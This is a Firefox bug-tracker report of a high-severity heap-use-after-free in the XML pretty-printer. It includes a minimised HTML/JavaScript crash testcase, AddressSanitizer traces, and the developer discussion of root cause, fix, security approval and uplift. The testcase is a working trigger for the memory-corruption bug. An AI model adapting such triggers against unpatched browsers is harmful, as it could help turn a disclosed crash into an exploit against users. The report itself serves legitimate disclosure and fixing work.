heap-use-after-free in nsXMLPrettyPrinter::PrettyPrint

VERIFIED FIXED in Firefox 58

Status

()

Core
DOM
P1
critical
VERIFIED FIXED
4 months ago
14 days ago

People

(Reporter: Nils, Assigned: mats)

Tracking

({csectype-uaf, regression, sec-high})

58 Branch
mozilla59
csectype-uaf, regression, sec-high
Points:
---
Bug Flags:
sec-bounty +
in-testsuite ?

Firefox Tracking Flags

(thunderbird_esr52 unaffected, firefox-esr52 unaffected, firefox57 unaffected, firefox58+ verified, firefox59+ verified)

Details

(Whiteboard: [post-critsmash-triage])

Attachments

(4 attachments)

(Reporter)

Description

4 months ago
Created attachment 8926358 [details]
crash.html (minimised testcase)

The following testcase crashes the latest ASAN build of Firefox nightly.

crash.html:
<script>
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o1=document.createElement('iframe');
    o1.src='data:text/xml,<x/>';
	o4=document;
	window.setTimeout("fun0()",10);
}
function fun0() {
	o150=document.documentElement.cloneNode(true);
	document.documentElement.appendChild(o150);
	o170=document.createElement('style');
	spin();
	o171=document.createTextNode("@import'/p/r'; { border-top-color} *{ scroll-snap-points-x: repeat(28rem");
	o170.appendChild(o171);
	o150.appendChild(o170);
	o4.write('<html><body><div></div><div></div></body></html>');
	window.top.document.documentElement.appendChild(o1);
	window.top.document.documentElement.appendChild(o170);
	window.setTimeout("location.reload()", 1000);
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==24871==ERROR: AddressSanitizer: heap-use-after-free on address 0x622000042100 at pc 0x7f4c0d8215b6 bp 0x7ffd226c0d30 sp 0x7ffd226c0d28
READ of size 8 at 0x622000042100 thread T0 (file:// Content)
    #0 0x7f4c0d8215b5 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16
    #1 0x7f4c0d81f70f in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #2 0x7f4c0d822bd4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #3 0x7f4c0d8231d3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #4 0x7f4c091ec6c5 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #5 0x7f4c091ec6c5 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #6 0x7f4c091f242c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #7 0x7f4c0911aee6 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15
    #8 0x7f4c076280c5 in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:878:18
    #9 0x7f4c0762849f in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:864:16
    #10 0x7f4c076758e6 in nsInputStreamPump::OnStateStop() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:704:20
    #11 0x7f4c07673cb6 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:428:25
    #12 0x7f4c07464d4d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #13 0x7f4c074a6ba1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f4c074cbbd6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f4c074e6098 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f4c082b8711 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #17 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7f4c0dc9f0ef in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #21 0x7f4c11fbb097 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #22 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f4c11fbaa4a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #26 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #27 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #28 0x7f4c24c7382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #29 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)

0x622000042100 is located 0 bytes inside of 5768-byte region [0x622000042100,0x622000043788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f4c0e404b5e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:840:1
    #2 0x7f4c0e50e8fb in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f4c0e50e8fb in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f4c0e50e8fb in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f4c0e505c24 in nsDocumentViewer::Hide() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2245:3
    #6 0x7f4c115993c9 in SetVisibility /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6612:9
    #7 0x7f4c115993c9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6602
    #8 0x7f4c0a38452a in nsFrameLoader::Hide() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1467:12
    #9 0x7f4c0e86cc90 in nsSubDocumentFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:1029:22
    #10 0x7f4c0e80209c in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:402:14
    #11 0x7f4c0e62be27 in nsBlockFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #12 0x7f4c0e62c98d in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #13 0x7f4c0e62c98d in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #14 0x7f4c0e689669 in nsCanvasFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:160:21
    #15 0x7f4c0e62c98d in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #16 0x7f4c0e62c98d in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #17 0x7f4c0e51fde4 in nsIFrame::Destroy() /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:674:5
    #18 0x7f4c0e6a0ab2 in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:174:16
    #19 0x7f4c0e4db818 in RemoveFrame /builds/worker/workspace/build/src/layout/base/nsFrameManager.cpp:535:18
    #20 0x7f4c0e4db818 in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8827
    #21 0x7f4c0e4c77e4 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10027:7
    #22 0x7f4c0e3f431a in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1513:25
    #23 0x7f4c0e469eba in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1159:9
    #24 0x7f4c0e428de0 in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1235:3
    #25 0x7f4c0e428de0 in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
    #26 0x7f4c0e428de0 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4196
    #27 0x7f4c0a2edb10 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:572:5
    #28 0x7f4c0a2edb10 in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8547
    #29 0x7f4c0e173447 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:946:13
    #30 0x7f4c0e174fb1 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1160:3
    #31 0x7f4c0e172af8 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring<char16_t> const&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #32 0x7f4c0d81ffae in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:81:28
    #33 0x7f4c0d81f70f in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #34 0x7f4c0d822bd4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #35 0x7f4c0d8231d3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #36 0x7f4c091ec6c5 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #37 0x7f4c091ec6c5 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #38 0x7f4c091f242c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #39 0x7f4c0911aee6 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f4c0a2b9663 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f4c0a2b9663 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4146
    #4 0x7f4c0e5015ef in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f4c0e500ebf in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f4c0e500127 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f4c115a11db in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9558:7
    #8 0x7f4c1159fb9c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7382:17
    #9 0x7f4c11538905 in nsDocShell::CreateContentViewer(nsTSubstring<char> const&, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9365:3
    #10 0x7f4c11536210 in nsDSURIContentListener::DoContent(nsTSubstring<char> const&, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:196:21
    #11 0x7f4c0911b5ea in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:739:28
    #12 0x7f4c09118d93 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:417:30
    #13 0x7f4c091177bb in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:295:8
    #14 0x7f4c076276d7 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:859:25
    #15 0x7f4c07674592 in nsInputStreamPump::OnStateStart() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:518:25
    #16 0x7f4c07673c1e in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:421:25
    #17 0x7f4c07464d4d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #18 0x7f4c074a6ba1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #19 0x7f4c074cbbd6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #20 0x7f4c074e6098 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #21 0x7f4c082b8711 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f4c0dc9f0ef in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #26 0x7f4c11fbb097 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #27 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f4c11fbaa4a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #31 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #32 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f4c24c7382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*)
Shadow bytes around the buggy address:
  0x0c44800003d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c44800003e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c44800003f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4480000400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4480000410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4480000420:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000430: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000440: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==24871==ABORTING
(Reporter)

Comment 1

4 months ago
Created attachment 8926359 [details]
ASAN output
Keywords: csectype-uaf, sec-high
Bug 1400618 maybe?
Group: core-security → dom-core-security
Flags: needinfo?(mats)
(Assignee)

Comment 3

4 months ago
That seems plausible if it's a recent regression.
I can't reproduce the crash in any of my local builds though.
Flags: needinfo?(mats)
Priority: -- → P1
(In reply to Mats Palmgren (:mats) from comment #3)
> That seems plausible if it's a recent regression.
> I can't reproduce the crash in any of my local builds though.

I can't reproduce this either.  Nils, can you repro on the latest nightly?  Anything special here required to repro?
Flags: needinfo?(nils)
(Reporter)

Comment 5

3 months ago
Oddly enough having the following flag in prefs.js set is required to reproduce the issue:

user_pref("browser.rights.3.shown", true);

With this it still reproduces on the very latest build from today (59.0a1)
Flags: needinfo?(nils)
Bisects to:
Start: 597025d8888fa91b9418231f33e65424d384d83f (20171107102812)
End: 923836aebbc328d1a971f6ce32a99d9aa4d1345a (20171107105646)
https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=597025d8888fa91b9418231f33e65424d384d83f&tochange=923836aebbc328d1a971f6ce32a99d9aa4d1345a
(Assignee)

Comment 7

3 months ago
Thanks, I can reproduce it with that pref set.
Assignee: nobody → mats
Blocks: 1400618
Severity: normal → critical
status-firefox57: --- → unaffected
status-firefox59: --- → affected
status-firefox-esr52: --- → unaffected
status-thunderbird_esr52: --- → unaffected
Keywords: regression
OS: Unspecified → All
Hardware: Unspecified → All
(Assignee)

Comment 8

3 months ago
Created attachment 8928234 [details]
stack for shell Destroy

The root cause is that the shell have been destroyed before
we get to the DestroyFramesForAndRestyle call.  It's destroyed
by the flush associated with the GetComputedStyle call here:
https://searchfox.org/mozilla-central/rev/bab833ebeef6b2202e71f81d225b968283521fd6/dom/xml/nsXMLPrettyPrinter.cpp#72,157
(Assignee)

Comment 9

3 months ago
Created attachment 8928266 [details] [diff] [review]
fix
Attachment #8928266 - Flags: review?(bzbarsky)
(Assignee)

Comment 10

3 months ago
I wasn't able to make the minimized testcase work as a crashtest.
I hit a fatal assert in the network code saying "attempting to connect
to external URI" or something like that.  I'm guessing it's from
the "x.open("POST","https://mozilla.org",false)" in the test and that
the crashtest framework prevents such connections with some pref.
Flags: in-testsuite?
The sync XHR there is just a way to spin the event loop.  The one place it's used is to basically do a wait between the assignments to o170 and o171.

Is it really needed?  Does just waiting until the load event has fired on the text/xml iframe before running the rest of fun0 there work?

And yes, the test harness prevents network connections to anything that's not on a small whitelist of sites (which are mapped to the harness http server), because any connections that actually hit the network cause intermittent test orange.
Flags: needinfo?(mats)
Comment on attachment 8928266 [details] [diff] [review]
fix

r=me
Attachment #8928266 - Flags: review?(bzbarsky) → review+
(Assignee)

Comment 13

3 months ago
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #11)
> The sync XHR there is just a way to spin the event loop.  The one place it's
> used is to basically do a wait between the assignments to o170 and o171.
> 
> Is it really needed?  Does just waiting until the load event has fired on
> the text/xml iframe before running the rest of fun0 there work?

It doesn't work because its onload isn't called before the line
window.top.document.documentElement.appendChild(o1) happens
(which inserts the <iframe>).

> And yes, the test harness prevents network connections to anything that's
> not on a small whitelist of sites (which are mapped to the harness http
> server), because any connections that actually hit the network cause
> intermittent test orange.

OK.  Fwiw, I tried using x.open("POST","://",false); together with HTTP
in the manifest but that just gave:
SecurityError: Permission denied to access property "document" on cross-origin object
(at the "appendChild(o1)")
Flags: needinfo?(mats)
> because its onload isn't called before the line window.top.document.documentElement.appendChild(o1)

OK, then what is that event loop spin waiting for?
(Assignee)

Comment 15

3 months ago
Comment on attachment 8928266 [details] [diff] [review]
fix

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Very unlikely.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No.

Which older supported branches are affected by this flaw?

v58

If not all supported branches, which bug introduced the flaw?

Bug 1400618.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Same patch.

How likely is this patch to cause regressions; how much testing does it need?

Unlikely; None.
Attachment #8928266 - Flags: sec-approval?
(Assignee)

Comment 16

3 months ago
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #14)
> OK, then what is that event loop spin waiting for?

I don't know.
Comment on attachment 8928266 [details] [diff] [review]
fix

sec-approval+. We'll want a beta patch nominated as well.
Attachment #8928266 - Flags: sec-approval? → sec-approval+
tracking-firefox58: --- → +
tracking-firefox59: --- → +
(Assignee)

Comment 19

3 months ago
Comment on attachment 8928266 [details] [diff] [review]
fix

Approval Request Comment
[Feature/Bug causing the regression]:
[User impact if declined]: possibly exploitable crash
[Is this code covered by automated tests?]:no
[Has the fix been verified in Nightly?]:no
[Needs manual test from QE? If yes, steps to reproduce]: no
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: no
[Why is the change risky/not risky?]: trivial change
[String changes made/needed]:none
Attachment #8928266 - Flags: approval-mozilla-beta?
Comment on attachment 8928266 [details] [diff] [review]
fix

Fix a sec-high. Beta58+.
Attachment #8928266 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Status: NEW → RESOLVED
Last Resolved: 3 months ago
Resolution: --- → FIXED
Group: dom-core-security → core-security-release
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Reproduced the initial crash using old Nightly asan build from (2017-11-08) on Ubuntu 16.04 64bit.

==3249==ERROR: AddressSanitizer: heap-use-after-free on address 0x622000000100 at pc 0x7f0f40d141a6 bp 0x7ffd1e985c10 sp 0x7ffd1e985c08
READ of size 8 at 0x622000000100 thread T0 (file:// Content)
    #0 0x7f0f40d141a5 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16
    #1 0x7f0f40d122ff in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #2 0x7f0f40d157c4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #3 0x7f0f40d15dc3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #4 0x7f0f3c6d8725 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #5 0x7f0f3c6d8725 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #6 0x7f0f3c6de48c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #7 0x7f0f3c606f46 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15
    #8 0x7f0f3ab13fa5 in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:878:18
    #9 0x7f0f3ab1437f in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:864:16
    #10 0x7f0f3ab617c6 in nsInputStreamPump::OnStateStop() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:704:20
    #11 0x7f0f3ab5fb96 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:428:25
    #12 0x7f0f3a950c2d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #13 0x7f0f3a992a81 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f0f3a9b7ab6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f0f3a9d1f78 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f0f3b7a4771 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #17 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7f0f41191cdf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #21 0x7f0f454adf97 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #22 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f0f454ad94a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #26 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #27 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
